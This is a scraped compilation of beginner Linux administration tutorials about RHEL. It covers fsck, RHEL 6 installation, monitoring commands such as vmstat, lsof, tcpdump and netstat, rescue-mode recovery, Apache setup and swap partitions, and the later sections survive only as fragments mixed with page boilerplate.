To run a fsck check on all the available partitions
To do a filesystem check on all partitions(including root partition), run the following command
with -A option
#fsck -A
A = Run fsck on all the available paritions

if you want to skip running fsck on the root(/) partition, then add the -R option with fsck as
shown below,
#fsck -AR
The above command skips running fsck on the “/”(root) partition and it runs on all the
remaining partitions.

your friends.
Thank you
#############################################################
##############################################################################
##
Leave a comment RHEL(Red Hat Enterprise Linux) error code, exit

status, filesystem, filesystem check, fsck 4 Dec 2018 VASANTH NIRMAL
Rhel 6 installation Step by

Step
22 Nov 2018 VASANTH NIRMAL
Installing RHEL 6:
Red Hat Enterprise Linux(RHEL 6) is Linux operating system Developed by Redhat.RHEL is
available on multiple platforms including x86,x86_64, IBM P-series, IBM System-Z. Redhat is
one of the most widely used Operating systems on Enterprise Level. Many other Linux
distribution has been cloned from Redhat Enterprise Linux, these include CentOS and Oracle
Linux.
To start the installation process:

Step:1 Select “Install or upgrade the Linux system”
Step:2 Begin Test Media Before Installation
It is always advisable to begin test media for any error before you starting the installation
process.In this example, i choose to skip option as i have done the check already.
Step:3 Welcome screen
At this screen, choose next to continue with the installation
Step:4 Select installation Language
At this screen you should select a language you would like to use during the installation, Here i
choose “English”
Step:5 Select Appropriate Keyboard
Select the keyboard you would like to use, here i have choosen us-english
Step:6 Select the devices to be used during the installation
Two options are avaiable here,from that here i have choosen Basic storage device option as we
are installing on a x86 system using local harddrive.
Step:7 Configure your Server Host name
Here you have to give one new host name by which it can be identified on your network.
Step:8 Select your Time Zone
Here you will need to locate the nearest city to your site. I have choosen Asia/Kolkata
Step:9 Assign a new root user password
you have to set a strong password. Never give a password based on the dictionary words. The
password should contain Upper and lower cases with the mixture of special charcters.
Step:10 Select Storage Installation type
You can choose various options where you can use all space avaiable or delete any existing
parition, create a custom parition type, here I go with the custom layout type

Step:11 Select a Disk to create Partition

Here i have only one disk /dev/sda, select “Standard partition”

Step:12 Add the parition “/”

Create “/” parition with the minimum size, here i gave 18Gb
Step 13: Confirm the assigned parition details
Select “yes” and press enter to go confirm
Step:14 Writing storage configuration to Disks
choose write changes to disks and press enter
Step:15 Choose the Disk to install Boot Loader
Select the disk to install the boot loader and press enter , here i choose /dev/sda disk to install the
bootloader
Step:16 Select the Installation type
The default installation of RHEL is that of a basic server. There are lots of option available
depending on what your server will be used for. Depending on which options you choose,
various packages will be included automatically with your installation .In this i have
choosen “Desktop” type.
Step:17 Package installation
Here the packages we have choosen manually will be installed and this process may take a while
depending upon your choices
Step:18 Congratulations your installation is now complete
Congratulations, you have now installed RHEL. You will need to reboot your system

Step:19 Welcome Screen
After the installation, you will get the welcome screen, choose “forward” to continue
Step:20 Software updates
From this screen, you can install the updates or if you want to install the updates later you will
have the options to select that
Step:20 Create a Non-root user account
You should create a non-root user account ,This account will be used for all non-administration
tasks
Step:21 Setup Date and Time
Check that you have the correct date and time . You may also specify to syncrnoize your time
with a time server over the network. In real envirnonment, many organazations will use sepreate
time servers for this functionallty.
Step:22 Kdump
kdump is used to collect the server information after a server crash. You will need to give the
double the size of the RAM for this configuration
Step:23 Login Screen
At this login screen, you will need to choose the user account to log in, choose others and give
“root” at the username field to log in to the server as a root user.
I hope you have enjoyed this tutorial, if so Kindly subscribe and share it with
your friends.
Thank you


#############################################################
##############################################################################
##
Leave a comment RHEL(Red Hat Enterprise Linux) Installation, Redhat installation, rhel
installation, rhel6 installation, step by step installation 22 Nov 2018 VASANTH NIRMAL
Monitoring Commands in
RedHat Linux Servers
Important Monitoring commands in Linux
For a system and network administrator, it’s very tough to debug and monitor the Linux servers
activities and performance daily. In this tutorial, I have compiled some important monitoring
commands that might be useful for the Linux/UNIX administrators. All these commands are
available under all flavors of UNIX and these commands are very much useful in probing the
cause for the errors.
1.vmstat(Virtual Memory Statistics):
This command will display the statistics of virtual memory, CPU activity, IO Blocks, Kernel
threads and many more.
Some Linux distribution will not be having this command by default, You will need to install
the systat package which contains the vmstat command.
#vmstat
2. To check the Active and Inactive Memory Details:

#vmstat -a
From the above output, you can check the active and inactive memory details,
the column si and so indicates the following meaning,
si = Swapped in every second from disk in kilobytes
so = Swapped out every second to disk in kilobytes
free = Total free memory spaces

3.lsof(List of Open Files):
This command is very much useful in analyzing which processes are accessing and opening the
files, and the open files include are Disk files, Pipes, Devices, Network sockets. For example
when you trying to unmount a filesystem and if it not unmounting which means some process is
accessing that filesystem, to check which processes are accessing the filesystem we can run
this “lsof” command to get the full report. With this command, we can easily identify which files
are in use
4. To list all open files
#lsof
From the above output,t it showing the long listing of open files
FD =File Descriptor and under this we will have some values ,
CWD =Current working directory
rtd = Root directory
mem = Memory mapped file
txt = Program text(Data and code)
TYPE of files and its identification
DIR =Directory
REG = Regular file
To learn more about “lsof” command visit this link Importance of lsof command
For More Linux Tutorial Videos visit my Youtube channel

Video Player
00:00
00:00
5.tcpdump (Network Packet Analyzer):
The tcpdump is the most useful command line Network packet analyzer or packets sniffer
program which is very much useful in capturing the TCP/IP packets that received or transferred
on a specified network adapter over a network. This tool has also an option to save the captured
data too a file for further analysis.
6. To capture the packets from a specific interface :
#tcpdump -i eth0
eth0 = Logical name of the network adapter,0 indicates the first adapter
Cancel the program by pressing ctrl+c, you will see the below output,
Note: This command saves the output in "pcap" format which can be viewed only by the "tcpdump"
command
7. To capture only “N” number of packets:
By default the “tcpdump” command captures all the packets for the specified interface until you
cancel the program, now by using one special option “-c” you can capture the specified number
of packets.
Below example captures only 4 packets
#tcpdump -c 4 -i eth0
8. To check the Number of Interfaces in you Server, run the following command
#tcpdump -D
8.To capture and save the Packets in a File:
#tcpdump -w mylog.pcap -i eth0
mylog.pcap= filename along with the extension .pcap
9.To View the Captured Packet Files

#tcpdump -r mylog.pcap
10.To Capture Packets from a specific Port:
For example, To capture the packets from the “ssh” port, run the following command,
#tcpdump -i eth0 port 22
11.Netstat(Network Statistics):
This command is very much useful in monitoring the Incoming and outgoing packets and also
you can monitor the interface statistics. When you are having connectivity issues to your server
the first most thing is you need to check the port is in listening or non-listening state, that can be
done by using the netstat command. This command is very much useful for the network
administrators to check and analyze the network related problems.
12. To check all Listening ports of TCP and UDP Connections:

#netstat -a |more
From the above output from the IP 192.168.1.175, one client is connected to my server via ssh
port and the connection status is ESTABLISHED
13.To List only TCP connection details
#netstat -at
14.To Display the Full Statistics by Protocols:
By default, the statistics can be displayed only for the TCP, UDP, ICMP, and IP protocols,
The -s option is used to specify a set of protocols
#netstat -s
You can check the full statistics by protocols like Number of active connections, the total
number of packets received, dropped and many more.
15.To display the statistics by TCP Protocols.
#netstat -st
You can check the total number of active connections and failed attempts via this protocol and
many more you can get from this command.
For Linux, Tutorial Videos visit my YouTube channel Linux Vasanth

Video Player
00:00
01:50
16.IOTOP Command:
This command is very much similar to the “top” command, the only difference is with iotop you
can check the real-time disk I/O and processe. This command is useful to find the exact process
and high used Disk read/write processes
your friends.
Thank you
#############################################################

##############################################################################
##
1 Comment RHEL Networking lsof, netstat, packets, tcpdump, unix, vmstat 17 Nov

2018 VASANTH NIRMAL
Rescue Mode In RedHat

Linux
What is Rescue Mode?
When something goes wrong in your Linux box, there are so many ways to resolve that,
however, these methods require that you to understand the system very well. As the name
implies, rescue mode is there to rescue you from something. In normal operations, the Red
Hat Linux systems use the files located on the system harddrive’s to do everything. But there
may be a time when you are unable to get the Linux running completely enough to access its
files on your system harddrive’s, By rescue mode, it is possible to access your files stored on
your system hard drive, even if you can’t actually run the Linux from your system Harddrive.
When Rescue Mode is required?

You might need to boot in to rescue mode for any of these following reasons mentioned below;
1.You forgot the root password and bootloader password

2. You might need to re-install the Bootloader(i.e, GRUB)
3. Having Software/Hardware issues and you need to retrieve some important data from
the hard drive
4.Unable to Boot the Linux in to the run level 3 or 5
Forgot the root and GRUB password:
What if you forgot your root password? You can boot your system to single user mode and from
where you can reset the root password by using the “passwd” command, To boot the system to
single user mode while booting, via bootloader is the only way to get in to single user mode, now
what if I have assigned the bootloader password? You have no options now to get in to the single
user mode when there is no way to recover your Linux box, “Rescue Mode” is the only way to
resolve all these types of problems.
Having Software/Hardware issues:
There can be as many different situations under this category, Things like failing hard drive and
forgetting to run the GRUB after building a new kernel, are the two things that can keep you
from booting Rehat Linux. If you can get in to the rescue mode you may be able to resolve the
problems and you can also get off some important files from your failing hard drives.
How to Boot the system in to Rescue Mode?
Use the following steps to boot in to the Rescue mode.
Step1: Boot the system from the Installation Media(cd/DVD)

Once the system has successfully booted from the iso image, you will get the Red Hat Linux
boot screen, choose the Rescue installed the system from the MENU SCREEN
Suppose if the Rescue option is not available means then you will need to choose the resue mode
by using the following options at the boot prompt
[F1-main] [F2:option] [F3:Genera] [F4:Kernel] [F5:Rescue]

boot: Rescue
Step:2 Choose the Language
Select Language by using the arrow keys and press enter

Step:3 Choose the Keyboard Type

Select the Keyboard type by using the arrow keys and press enter

Step:4 Select the media contains the Rescue image

Step:5 Network type
If you want to access the system over the network in Rescue mode you can configure it from
here. Mostly in the rescue mode network configuration are unnecessary.

Step:6 Next, a screen will appear telling you that the program now will attempt
to find the RedHat Linux installation to rescue, choose “select” and enter
Step:7 Now you are in Rescue mode, if you grant it, then your root filesystem is
mounted under the /mnt/sysimage directory, for example, all you files will be
mounted under this location,your /etc/inittab file will get mounted
under /mnt/sysimage/etc/inittab.
Once it is mounted under the /mnt/sysimage you will get the below confirmation on your screen
Step:8 Start the resuce mode shell and enter
Run the below command after entering in to the command line mode
#chroot /mnt/sysimage
After this, you can open the system files to make the neccessary changes to make it function
properly.
To exit from Rescue mode:

Type “exit” command twice to come out from the rescue envirnonment
#exit (Leaving chroot environment)
#exit (Leaving Rescue mode and restart)

Then choose “reboot” and press enter, this time your system will restart and reload all the
selinux polices .
your friends.

Apache Web Server in RHEL

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Apache Web Server in RHEL

Uploaded by

Copyright:

Available Formats

Apache Web Server in RHEL

10 Jul 2021 VASANTH NIRMAL

The two main applications are:

What is Web Server?

Examples of Web Server:

1.httpd It installs the Apache web server

2.mod_ssl It is needed for creating a secure web sites

3.elinks It is required to implement text based web browser

#yum -y install httpd

Click here to view Yum Repository configuration on RHEL

#rpm -ivh httpd* --nodeps --force

How to install packages with “rpm” tool

# rpm -ivh mod_ssl* --nodeps --force

#rpm -ivh elinks* --nodeps --force

#rpm -qa httpd*

# rpm -qa mod_ssl*

# rpm -qa elinks*

What is KERNEL Program?

#service httpd start

Apache Config file–> /etc/httpd/conf/httpd.conf

7)DirectoryIndex index.html: When we open a website in a browser it goes to a certain

#service httpd status

#service httpd configtest

How to restrict a IP to access Webserver?

Let me Restrict the IP 192.168.43.210 which is the windows client system

#service httpd restart

Setup Webserver with user name and Password

-c = Create a New file

2. Apache Web Server in RHEL Server » Vasanth Blog on What is KERNEL Program?July

5. Apache Web Server in RHEL Server » Vasanth Blog on Yum configuration in Redhat

[…] Click here to view Yum Repository configuration on RHEL […]

Leave a comment RHEL Networking apache, DNS, httpd, webserver 10 Jul 2021 VASANTH

What is swap space?

The Main adavantage of Having the Swap Memory

It stops RAM from running out of space

Backup for enhancing the original space of RAM

It always increases the performance of the server.

Swap space is very essential in Linux server

Command (m for help): n

Partition number (1-4): 3

Last cylinder, +cylinders or +size{K,M,G} (2682-3916, default 3916): +2G

Command (m for help): p

Command (m for help): l

Command (m for help): t

Partition number (1-4): 3

Hex code (type L to list codes): 82

Command (m for help): p

Command (m for help): w

To Format a partition with mkswap command

Now Activate the swap partition as follows

Links given Below

Click here to Subscribe linuxvasanth Weekly Updates

[…] https://www.linuxvasanth.com/install-packages-redhat-linux/ How to install

5. Apache Web Server in RHEL Server » Vasanth Blog on Yum configuration in Redhat

[…] Click here to view Yum Repository configuration on RHEL […]

1 Comment RHEL(Red Hat Enterprise Linux) Disk parition, fdisk, linux

What is KERNEL Program?

Click here to Subscribe to linuxvasanth.com for More Tutorials

2. Apache Web Server in RHEL Server » Vasanth Blog on What is KERNEL Program?July

[…] https://www.linuxvasanth.com/install-packages-redhat-linux/ How to install

5. Apache Web Server in RHEL Server » Vasanth Blog on Yum configuration in Redhat

[…] Click here to view Yum Repository configuration on RHEL […]

 Apache Web Server in RHEL